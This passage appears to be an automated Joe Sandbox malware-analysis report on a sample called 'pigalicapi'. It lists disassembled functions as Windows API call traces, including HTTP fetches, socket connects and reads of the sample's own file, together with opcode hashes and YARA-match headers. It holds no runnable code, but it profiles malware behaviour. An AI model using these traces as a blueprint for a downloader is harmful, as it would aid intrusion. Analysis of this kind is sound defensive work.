                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
                                                                                                                                                                                • String ID: TEMP
                                                                                                                                                                                • API String ID: 3110491842-1036413054
                                                                                                                                                                                • Opcode ID: b6d6b94a38e5d5b910b5683f39ed2d6d45822fc5cee9b3dacabe5f54df6a2b05
                                                                                                                                                                                • Instruction ID: d0cd080c7c8d4f1cc959e6e01bf93a65081873afeb0f5e09a163d50539968786
                                                                                                                                                                                • Opcode Fuzzy Hash: b6d6b94a38e5d5b910b5683f39ed2d6d45822fc5cee9b3dacabe5f54df6a2b05
                                                                                                                                                                                • Instruction Fuzzy Hash: 7FF12C75A00209EFDB24DF98D989F9DBBB5FB88300F24819AE505AB391D731AE41DF50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • InternetOpenA.WININET(005DC398,00000001,00000000,00000000,00000000), ref: 005D293C
                                                                                                                                                                                • InternetConnectA.WININET(00000000,00000000,000001BB,005DC3D2,005DC3D1,00000003,00000000,00000000), ref: 005D296C
                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,GET,005DC3D8,1.1,00000000,00000000,80800000,00000000), ref: 005D299D
                                                                                                                                                                                • wsprintfA.USER32 ref: 005D29C0
                                                                                                                                                                                • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 005D29E8
                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005D2A0E
                                                                                                                                                                                • lstrlenA.KERNEL32(Accept: */*,00000000,00000000), ref: 005D2A1C
                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,Accept: */*,00000000), ref: 005D2A2B
                                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 005D2A73
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 005D2AAF
                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 005D2ACB
                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 005D2AD5
                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 005D2ADF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Internet$CloseHandle$HttpOpenOptionRequest$ConnectErrorFileLastQueryReadSendlstrlenwsprintf
                                                                                                                                                                                • String ID: 1.1$Accept: */*$GET$https://%s
                                                                                                                                                                                • API String ID: 2082764430-47765423
                                                                                                                                                                                • Opcode ID: d83d51aa5aa159312250d51d4b58d0ac681e713814773a8bb12086423959ef8b
                                                                                                                                                                                • Instruction ID: 8343f0ba93929a19c9d43ff811b6b9a37c458e9c2f96ad6875aa88e4c5de0f4b
                                                                                                                                                                                • Opcode Fuzzy Hash: d83d51aa5aa159312250d51d4b58d0ac681e713814773a8bb12086423959ef8b
                                                                                                                                                                                • Instruction Fuzzy Hash: F4510D71941219ABDB34CF98DC89BEEBBB4FB58700F10858BF605A6380C7B49A94DF54
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?), ref: 005D35F4
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 005D362D
                                                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 005D3651
                                                                                                                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 005D3673
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005D369C
                                                                                                                                                                                • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 005D36DD
                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 005D371F
                                                                                                                                                                                • lstrcpynA.KERNEL32(?,?,-00000001), ref: 005D380C
                                                                                                                                                                                • lstrcatA.KERNEL32(?,.dll), ref: 005D381E
                                                                                                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 005D383C
                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 005D38B3
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 005D38C7
                                                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 005D38D4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Virtual$FreeHandleModule$AllocCloseCreateNameReadSizelstrcatlstrcpylstrcpynlstrlen
                                                                                                                                                                                • String ID: .dll
                                                                                                                                                                                • API String ID: 4040249471-2738580789
                                                                                                                                                                                • Opcode ID: 74bf4a2302793e4b58f00bcd7516c50ac9bd2dd1801b31fd9095f91e74a1e732
                                                                                                                                                                                • Instruction ID: 968aa88c70671f7b4f3f71741c7e634064ae898a5a8c08d78a8e617bcf834952
                                                                                                                                                                                • Opcode Fuzzy Hash: 74bf4a2302793e4b58f00bcd7516c50ac9bd2dd1801b31fd9095f91e74a1e732
                                                                                                                                                                                • Instruction Fuzzy Hash: 93816CB1D41229EBDB30DBA4DC89BDDBBB9BB58304F1041CAF209A7280D6749B84DF55
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 005D2B72
                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005D2B93
                                                                                                                                                                                • InternetOpenUrlA.WININET(00000000,00000000,?,00000042,80000200,00000000), ref: 005D2BB0
                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005D2C08
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005D2C48
                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00000000,00000000), ref: 005D2C97
                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,0000001D,?,00000100,00000000), ref: 005D2D35
                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,gzip), ref: 005D2D4B
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 005D2DC8
                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 005D2DD2
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 005D2DDA
                                                                                                                                                                                Strings
                                                                                                                                                                                • Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate, xrefs: 005D2B32
                                                                                                                                                                                • gzip, xrefs: 005D2D3F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Internet$Query$HttpInfoOptionVirtual$AllocCloseErrorFileFreeHandleLastOpenReadlstrcmpi
                                                                                                                                                                                • String ID: Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate$gzip
                                                                                                                                                                                • API String ID: 2564233093-2863726208
                                                                                                                                                                                • Opcode ID: 5e9233bd1e2c51078ed53071460a85b47d409745d8a25b9a7d238b4ac653b002
                                                                                                                                                                                • Instruction ID: 07fc37d3967937961b98606e07c7c058ccffbc7a7f75eaf5405064d25cd755f2
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e9233bd1e2c51078ed53071460a85b47d409745d8a25b9a7d238b4ac653b002
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C911D7190422CEFDB24DF94CC48BEEBBB9BB58300F50859AE509AB280DB755E84DF50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 0120ABE4
                                                                                                                                                                                  • Part of subcall function 0120C250: _free.LIBCMT ref: 0120C26D
                                                                                                                                                                                  • Part of subcall function 0120C250: _free.LIBCMT ref: 0120C27F
                                                                                                                                                                                  • Part of subcall function 0120C250: _free.LIBCMT ref: 0120C291
                                                                                                                                                                                  • Part of subcall function 0120C250: _free.LIBCMT ref: 0120C2A3
                                                                                                                                                                                  • Part of subcall function 0120C250: _free.LIBCMT ref: 0120C2B5
                                                                                                                                                                                  • Part of subcall function 0120C250: _free.LIBCMT ref: 0120C2C7
                                                                                                                                                                                  • Part of subcall function 0120C250: _free.LIBCMT ref: 0120C2D9
                                                                                                                                                                                  • Part of subcall function 0120C250: _free.LIBCMT ref: 0120C2EB
                                                                                                                                                                                  • Part of subcall function 0120C250: _free.LIBCMT ref: 0120C2FD
                                                                                                                                                                                  • Part of subcall function 0120C250: _free.LIBCMT ref: 0120C30F
                                                                                                                                                                                  • Part of subcall function 0120C250: _free.LIBCMT ref: 0120C321
                                                                                                                                                                                  • Part of subcall function 0120C250: _free.LIBCMT ref: 0120C333
                                                                                                                                                                                  • Part of subcall function 0120C250: _free.LIBCMT ref: 0120C345
                                                                                                                                                                                • _free.LIBCMT ref: 0120ABD9
                                                                                                                                                                                  • Part of subcall function 0120A64E: HeapFree.KERNEL32(00000000,00000000,?,0120C3E5,01209521,00000000,01209521,00000000,?,0120C40C,01209521,00000007,01209521,?,0120AD38,01209521), ref: 0120A664
                                                                                                                                                                                  • Part of subcall function 0120A64E: GetLastError.KERNEL32(01209521,?,0120C3E5,01209521,00000000,01209521,00000000,?,0120C40C,01209521,00000007,01209521,?,0120AD38,01209521,01209521), ref: 0120A676
                                                                                                                                                                                • _free.LIBCMT ref: 0120ABFB
                                                                                                                                                                                • _free.LIBCMT ref: 0120AC10
                                                                                                                                                                                • _free.LIBCMT ref: 0120AC1B
                                                                                                                                                                                • _free.LIBCMT ref: 0120AC3D
                                                                                                                                                                                • _free.LIBCMT ref: 0120AC50
                                                                                                                                                                                • _free.LIBCMT ref: 0120AC5E
                                                                                                                                                                                • _free.LIBCMT ref: 0120AC69
                                                                                                                                                                                • _free.LIBCMT ref: 0120ACA1
                                                                                                                                                                                • _free.LIBCMT ref: 0120ACA8
                                                                                                                                                                                • _free.LIBCMT ref: 0120ACC5
                                                                                                                                                                                • _free.LIBCMT ref: 0120ACDD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                • Opcode ID: e292326583a02ab671bfda74c6915f31277ed324ca7561871b4f8450dc54b2d8
                                                                                                                                                                                • Instruction ID: d0f9ea7995a6229dad0deab3345fb06fca771563703c4db7c41e650d05ee50b7
                                                                                                                                                                                • Opcode Fuzzy Hash: e292326583a02ab671bfda74c6915f31277ed324ca7561871b4f8450dc54b2d8
                                                                                                                                                                                • Instruction Fuzzy Hash: 80317E316203069FEB33AB78DD44BA6B7E9FF50310F954A19E649D71D2EE31A8808714
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 01209B96
                                                                                                                                                                                  • Part of subcall function 0120A64E: HeapFree.KERNEL32(00000000,00000000,?,0120C3E5,01209521,00000000,01209521,00000000,?,0120C40C,01209521,00000007,01209521,?,0120AD38,01209521), ref: 0120A664
                                                                                                                                                                                  • Part of subcall function 0120A64E: GetLastError.KERNEL32(01209521,?,0120C3E5,01209521,00000000,01209521,00000000,?,0120C40C,01209521,00000007,01209521,?,0120AD38,01209521,01209521), ref: 0120A676
                                                                                                                                                                                • _free.LIBCMT ref: 01209BA2
                                                                                                                                                                                • _free.LIBCMT ref: 01209BAD
                                                                                                                                                                                • _free.LIBCMT ref: 01209BB8
                                                                                                                                                                                • _free.LIBCMT ref: 01209BC3
                                                                                                                                                                                • _free.LIBCMT ref: 01209BCE
                                                                                                                                                                                • _free.LIBCMT ref: 01209BD9
                                                                                                                                                                                • _free.LIBCMT ref: 01209BE4
                                                                                                                                                                                • _free.LIBCMT ref: 01209BEF
                                                                                                                                                                                • _free.LIBCMT ref: 01209BFD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: cdf2e1cf4ed5f74fb5be825dac392a30739be05ba463e8c6925c5c3fe7d7fa0d
                                                                                                                                                                                • Instruction ID: 017f428c72df5f80b2925008c49fbe0f39b802537d3da073169fcb15853ddd33
                                                                                                                                                                                • Opcode Fuzzy Hash: cdf2e1cf4ed5f74fb5be825dac392a30739be05ba463e8c6925c5c3fe7d7fa0d
                                                                                                                                                                                • Instruction Fuzzy Hash: 55119B75560209BFCF12EF54CC51CED3B75FF54250B914295FA098F16ADA32DE909B40
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,01211706,?,00000000,?,00000000,00000000), ref: 01210FD3
                                                                                                                                                                                • __fassign.LIBCMT ref: 0121104E
                                                                                                                                                                                • __fassign.LIBCMT ref: 01211069
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0121108F
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,01211706,00000000,?,?,?,?,?,?,?,?,?,01211706,?), ref: 012110AE
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,01211706,00000000,?,?,?,?,?,?,?,?,?,01211706,?), ref: 012110E7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                • Opcode ID: f2484ce0f3889209a5009832da7f3b15f05a5154a49cf77acb2bd1ff2035f5e7
                                                                                                                                                                                • Instruction ID: b62386c7d3bd54fb1f1c5ced14575977736884125d298e5e9e20b7429dea00cf
                                                                                                                                                                                • Opcode Fuzzy Hash: f2484ce0f3889209a5009832da7f3b15f05a5154a49cf77acb2bd1ff2035f5e7
                                                                                                                                                                                • Instruction Fuzzy Hash: CC519271E102499FDF10CFA8D885AEEBBF8FF28310F14411AEA51E7285E770A951CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 005DA09C
                                                                                                                                                                                • htons.WS2_32(?), ref: 005DA0C0
                                                                                                                                                                                • gethostbyname.WS2_32(?), ref: 005DA0CD
                                                                                                                                                                                • connect.WS2_32(000000FF,?,00000010), ref: 005DA121
                                                                                                                                                                                • closesocket.WS2_32(000000FF), ref: 005DA13E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 530611402-0
                                                                                                                                                                                • Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                • Instruction ID: 57611d77367fb6744cc8b86791668986f54f829d63abcae6acc052aba9d6c613
                                                                                                                                                                                • Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                • Instruction Fuzzy Hash: 91313E71A00219EBDB20DFE8C845BEEBB76BF48710F104A5BE5216B3C0D3B59940C752
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0120C3B7: _free.LIBCMT ref: 0120C3E0
                                                                                                                                                                                • _free.LIBCMT ref: 0120C441
                                                                                                                                                                                  • Part of subcall function 0120A64E: HeapFree.KERNEL32(00000000,00000000,?,0120C3E5,01209521,00000000,01209521,00000000,?,0120C40C,01209521,00000007,01209521,?,0120AD38,01209521), ref: 0120A664
                                                                                                                                                                                  • Part of subcall function 0120A64E: GetLastError.KERNEL32(01209521,?,0120C3E5,01209521,00000000,01209521,00000000,?,0120C40C,01209521,00000007,01209521,?,0120AD38,01209521,01209521), ref: 0120A676
                                                                                                                                                                                • _free.LIBCMT ref: 0120C44C
                                                                                                                                                                                • _free.LIBCMT ref: 0120C457
                                                                                                                                                                                • _free.LIBCMT ref: 0120C4AB
                                                                                                                                                                                • _free.LIBCMT ref: 0120C4B6
                                                                                                                                                                                • _free.LIBCMT ref: 0120C4C1
                                                                                                                                                                                • _free.LIBCMT ref: 0120C4CC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 81ab72453c0c5a895ff8120d2ca59417f4397165763d7641f5764ac0e944eb99
                                                                                                                                                                                • Instruction ID: c33b49e5545c491438225ddfaffec737ac59613ad0649066676e9ad75c97c726
                                                                                                                                                                                • Opcode Fuzzy Hash: 81ab72453c0c5a895ff8120d2ca59417f4397165763d7641f5764ac0e944eb99
                                                                                                                                                                                • Instruction Fuzzy Hash: D11184B1560709AADB22B7B0CC05FEB77BDAFA1700F400B1AA399A60D2DA35F6144760
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                                • Opcode ID: 697d0c3c9b0ea935a04166266f325c90ea9bde146ede6596b10729b55f9bdaf1
                                                                                                                                                                                • Instruction ID: 8d59aa57ce25b1ade3776d4a011ff85e1f1b67d47a55718950bcafcb44ab3494
                                                                                                                                                                                • Opcode Fuzzy Hash: 697d0c3c9b0ea935a04166266f325c90ea9bde146ede6596b10729b55f9bdaf1
                                                                                                                                                                                • Instruction Fuzzy Hash: 79F0A9359A471267DB2362287D0DFAE2979BBE5525B140314FB1F931C7EE6184824351
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0120BC19,00000003,?,0120BBB9,00000003,01234478,0000000C,0120BCCC,00000003,00000002), ref: 0120BC44
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0120BC57
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0120BC19,00000003,?,0120BBB9,00000003,01234478,0000000C,0120BCCC,00000003,00000002,00000000), ref: 0120BC7A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                • Opcode ID: ab7d20d0f3d3164a35ae805f39c53e82650d1c4ac8e298548f0fd851189272d3
                                                                                                                                                                                • Instruction ID: 96af2c0018b1b0369c7d8d6021ad77abed2715605133d5230cc58b7e649b3002
                                                                                                                                                                                • Opcode Fuzzy Hash: ab7d20d0f3d3164a35ae805f39c53e82650d1c4ac8e298548f0fd851189272d3
                                                                                                                                                                                • Instruction Fuzzy Hash: A8F0AF34A2021DBFDB219FA4E80CBAEBFB4EF14711F010168F905A2180EF70AA40CB90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 005D92A7
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 005D92AE
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 005D92C1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                • API String ID: 4190356694-3024904723
                                                                                                                                                                                • Opcode ID: 193df307ec2b85e645575ba15b068e25dde855bdbaf72ade3d94b46a3ab0610b
                                                                                                                                                                                • Instruction ID: f4627f9e297176be5f91bf7ec564734dd7464240a10543d05a476051aa69d448
                                                                                                                                                                                • Opcode Fuzzy Hash: 193df307ec2b85e645575ba15b068e25dde855bdbaf72ade3d94b46a3ab0610b
                                                                                                                                                                                • Instruction Fuzzy Hash: 24E0E578801209EBCB20EBE4994DB8CBF78BB08302F504197E901E2240D6746A48DB51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 0120C581
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0120C5B9
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0120C60A
                                                                                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0120C61C
                                                                                                                                                                                • __freea.LIBCMT ref: 0120C625
                                                                                                                                                                                  • Part of subcall function 0120C4E6: RtlAllocateHeap.NTDLL(00000000,?,?,?,0120C5D8,00000000), ref: 0120C518
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
